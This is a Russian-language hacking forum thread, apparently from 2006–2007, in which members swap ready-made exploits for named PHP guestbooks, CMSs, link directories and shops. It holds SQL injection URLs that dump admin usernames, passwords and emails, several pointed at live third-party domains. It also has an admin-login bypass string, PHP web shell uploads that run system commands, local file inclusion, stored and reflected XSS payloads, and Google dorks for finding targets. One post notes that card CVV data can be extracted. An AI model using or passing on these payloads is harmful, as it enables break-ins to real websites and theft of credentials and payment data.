Энциклопедия уязвимых скриптов

Discussion in 'Веб-уязвимости' started by DIAgen, 1 Jun 2006.

  1. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Joined:
    6 Dec 2006
    Messages:
    224
    Likes Received:
    152
    Reputations:
    8
    В своё время начал собирать уязвимости для себя. В общем, кому надо забирайте - _http://slil.ru/24435960.
     
    3 people like this.
  2. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    siteframe SQL inj
    http://site/user.php?id=-1+union+select+1,2,3,4,concat(VERSION(),0x3a,DATABASE(),0x3a,USER())/*
    Скромно, но полезно :)
     
  3. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    WR-Guest 1.0

    Активная XSS:

    При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре соообщений.
     
    #23 Grey, 4 Jun 2007
    Last edited: 5 Jun 2007
  4. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    57
    Likes Received:
    24
    Reputations:
    8
    SimPoll v.1.0

    Активная XSS:

    админка управления опросами обычно открыта (файл test_poll_admin.php) в помощью админки можно изменить текущий опрос. при введении текста опроса данные не фильтруются. возможна вставка своего ява-скрипта

    google dork: inurl:test_poll_results.php
     
  5. dmnt

    dmnt Elder - Старейшина

    Joined:
    6 Jun 2007
    Messages:
    89
    Likes Received:
    36
    Reputations:
    15
    cartkeeper

    SQL-inj

    hxxp://ckgold.cartkeeper.com/item.php?item_id=-1&category_id=27+group+by+tbl_item.item_id+union+select+1,version(),3,user()/*
     
    1 person likes this.
  6. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Скрипты статистики посещений:

    1. Сервер статистики ГелиоСтат

    Активная XSS:

    В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики.

    2. pronuserinfoSQL v1.2

    Активная XSS:

    В переменной $HTTP_REFERER значения не фильтруются, вписанный в реферер, скрипт будет выполнятся при просмотре статистики.

    SQL инъекция:

    На странице view.php в поле "отследить последних..." вводим:

    ' union select 1,2,3,4,5,6/*

    3. SEbotInfo 2.0

    Активная XSS:

    На странице в sebot.php переменные:

    HTTP_USER_AGENT вписываем Yandex.

    HTTP_HOST вписываем тело скрипта.

    Скрипт будет выполняться при просмотре статистики на странице sebotinfo.php.

    4. BotsInfo v0.03

    Активная XSS:

    На странице в write.php переменные:

    HTTP_USER_AGENT вписываем Yandex.

    HTTP_HOST вписываем тело скрипта.

    Скрипт будет выполняться при просмотре статистики на странице botsinfo.php.
     
    #26 Grey, 9 Jun 2007
    Last edited: 12 Jun 2007
    9 people like this.
  7. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    EJ3 TOP 1.4

    Заливка шелла:

    При добавление ссылки на сайт в поле Banner URL вводим:

    '; ?> <?php Код шелла ?> <?php $a='

    После ввода данных получаем ID:

    К примеру: 1181902021

    Шелл будет доступен по адресу:

    http://site.ru/data/1181902021info.php

    http://site.ru/data/[id]info.php

    -----------------------------------------------------------

    Ссылки и каталоги ссылок

    1. Link Database

    SQL инъекция:

    http://site.ru/links.php?category=-1+union+select+1,2,3,4,5,6/*

    2. Link Up

    SQL инъекция:

    http://site.ru/category.php?category=-1+union+select+1,2/*

    Доступ в админку:

    http://site.ru/admin/index.php

    В поле Username вводим:
    ' or 1=1 /*

    3. SM(links) v2.0

    Отсутствие .htaccess:

    Смотрим файл config.inc - в нём хранятся логин и пароль к админке:

    http://site.ru/config.inc

    4. xLink v2.1

    Пассивная XSS:

    http://site.ru/poisk.php?poisk='><script>alert();</script>

    5. My Link 1.00

    Активная XSS:

    При добавление ссылки в поле Имя ссылки или Описание ссылки вводим скприпт, скрипт будет выполняться при просмотре ссылок.

    6. Quick Link

    Активная XSS:

    При добавление категории (Add Category) вводим скрипт, скрипт будет выполняться при просмотре ссылок.
     
    #27 Grey, 15 Jun 2007
    Last edited: 18 Jun 2007
    3 people like this.
  8. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    scozbook 1.1
    Code:
    http://site.ru/admin/edit.php?id=-2'+union+select+1,convert(concat(adminname,char(58),adminpass,char(58),adminemail)+using+cp1251),3,4,5,6,7,8,9,10+from+scozbook_admin+limit+0,1/*
     
  9. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Гостевые книги:

    FastStarter

    Активная XSS:

    Вписываем скрипт в поле name.

    Mandralivre 4.1

    Активные XSS:

    Вписываем скрипт в поля Votre nom, Votre email, Votre site web.

    hwdeGUEST 2.0

    Активная XSS:

    Вписываем скрипт в поле Name.
     
    3 people like this.
  10. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Закрытая гостевая книга v 1.0 (websmith)

    вход в админку без пароля
    Code:
    www.site.ru/admin/index.php
    гостевуха стоит 20 баксов, а в демке нехватаит возможности изменения данных. Вполне возможно что в полной версии можно встретить XSS
    _________________

    guest v1.1

    если криво настроены права то можно прочитать файл с логином и паролем
    Code:
    www.site.ru/passwd.dat
    все это дело выглядит след образом
    PHP:
    <?php
    $Password
    ['admin'] = "d8578edf8458ce06fbc5bb76a58c5ca4";
    ?>
    логин - admin
    пароль(мд5) - d8578edf8458ce06fbc5bb76a58c5ca4

    заливка шелла выполняеться из админ панели
    Code:
    http://site.ru/admin.php?design
    в поле файла header.inc.php вписываем
    PHP:
    <?php system($_GET[cmd]); ?>
    и выполняем
    Code:
    http://site.ru/design/header.inc.php?cmd=команда
     
    #30 _Pantera_, 28 Jun 2007
    Last edited: 28 Jun 2007
  11. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    немного PHP-inj.

    PHP::HTML 0.6.4 (PHP-inj)
    phphtml.php?htmlclass_path=[/color] [size=3][b][color=green...d_adm.php?SETS[path][physical]=[file][/color]
     
    2 people like this.
  12. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    AMGuests0.3.0

    1) Локальный инклуд файлов.

    Требуется:

    register_globals = On
    magic_quotes = Off

    Code:
    http://site.ru/gb/signin.php?sent=1&AMG_serverpath=FILE%00
    2) Пассивные XSS.

    Требуется:

    register_globals = On

    Code:
    http://site.ru/gb/signin.php?AMG_signin_name="><script>alert(1);</script>
    http://site.ru/gb/signin.php?AMG_signin_location="><script>alert(1);</script>
    http://site.ru/gb/signin.php?AMG_signin_icq="><script>alert(1);</script>
    http://site.ru/gb/signin.php?AMG_signin_email="><script>alert(1);</script>
    http://site.ru/gb/signin.php?AMG_currentlanguage[signin_form_userimage]="><script>alert(1);</script>
     
  13. Ni0x

    Ni0x Elder - Старейшина

    Joined:
    27 Aug 2006
    Messages:
    338
    Likes Received:
    157
    Reputations:
    37
    Virtual War v1.5.0 or low
    XSS и SQL-INJ
    зы: Powered by: Virtual War v1.5.0
     
  14. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    SQL-inj в QuickEstore

    Существует возможность провести sql-инъекцию из-за недостаточной обработки входных данных в параметре CFTOKEN в скрипте insertorder.cfm.

    Пример:

    Кол-во полей везде разное, но в основном от 15 до 19.

    Есть и cvv, но он в таблице PARAMS и есть почему-то не везде, но можно вывести его и через последние заказы.

    Вот всё остальное (после TABLE таблица, ниже колонки в ней):


    На счет версии не знаю, но в гугле на запрос
    каждая вторая уязвима.



    P.S.: Вроде ничё не забыл :)
     
    #34 n0ne, 19 Jul 2007
    Last edited: 19 Jul 2007
  15. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Раскрытие пути в ARTEShok CMS:

    ^^^ их оф.сайт ^^^
     
  16. Dr.Frank

    Dr.Frank Elder - Старейшина

    Joined:
    31 Jul 2002
    Messages:
    301
    Likes Received:
    72
    Reputations:
    12
    SQL-инъекция в CMS Koobi

    CMS Koobi v4.2 v5.8 v6.1 со страницей скачки файлов
    возможно другие версии(тестировал только на этих)

    http://site/index.php?area=1&p=downloads&categ=-1+union+select+1,concat(email,0x3a,pass),3+from+table_name/*

    Наиболее вероятные зачения table_name:
    Code:
    koobi4_user
    kpro_user
    kpro5_user
    kpro6_user
    для авторизации нужны email и пароль

    Пароль - дважды хэшированный md5: md5(md5($pass))
     
    1 person likes this.
  17. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Open Guestbook 0.5

    Скачать можно здесь:

    http://sourceforge.net/project/showfiles.php?group_id=82463

    1) Пассивная XSS

    Code:
    http://localhost/header.php?title=</title><script>alert(123);</script>
    2) SQL инъекция/активная XSS

    В скрипте process.php из-за отсутсвия фильтрации можно провести инъекцию в запросе INSERT...

    При добавление сообщения в поле Message вводим:

    Code:
    ','','','', '', '', '', '', '', '><script>alert(111);</script>', '', '', '')/*
    В результате получим выполнение нашего скрипта при просмотре сообщений, т.е. получаем активную xss.
     
    #37 Grey, 15 Sep 2007
    Last edited: 15 Sep 2007
  18. phol1eadeux

    phol1eadeux Elder - Старейшина

    Joined:
    7 Aug 2007
    Messages:
    108
    Likes Received:
    48
    Reputations:
    -1
    artCifra CMS v4.5
    Уязвимость в cookie. Имя куки artcifraSES. Возможность проведения SQL инъекции.
    Пример:
    Изменяем содержимое куки на:
    Code:
    ')+union+select+column1,column2+from+some_table
     
  19. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    CONTENTdm

    Пассивные XSS:

    1) в скрипте results.php уязвимы переменная CISOBOX1, CISOBOX2 и т.д.

    кстати найдена мной 05.07.2007

    а в багтраках появилась только 06.08.2007, так что если и баян, то свой, так сказать для полноты сюда запостил

    2) во многих скриптах в переменной CISOROOT
    примеры:
    Code:
    http://contentdm.nitle.org/cdm4/item_viewer.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E
    Code:
    http://mdc.cbuc.cat/cdm4/document.php?CISOROOT=%3Cscript%3Ealert(document.cookie);%3C/script%3E
     
    #39 Scipio, 15 Nov 2007
    Last edited: 15 Nov 2007
  20. Ky3bMu4

    Ky3bMu4 Elder - Старейшина

    Joined:
    3 Feb 2007
    Messages:
    487
    Likes Received:
    284
    Reputations:
    42
    A-Shop​
    Версии: 4.4.1(возможно и более ранние) - 4.7.х(last)

    SQL-инъекция с доступом в user и с незашифренными пасами.

    Уязвимость в catalogue.php , переменная cat, фильтрации никакой нет. Колличество столбцов 33,32 или 2.

    Пример:
    Code:
    http://www.the123d.com/shop/catalogue.php?cat=-21+union+select+1,username,3,4,password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+user/*
    
    Админка:
    http://www.the123d.com/shop/admin/login.php
    

    Отправил на video@antichat.ru должны скоро выложить.
     
    1 person likes this.
Loading...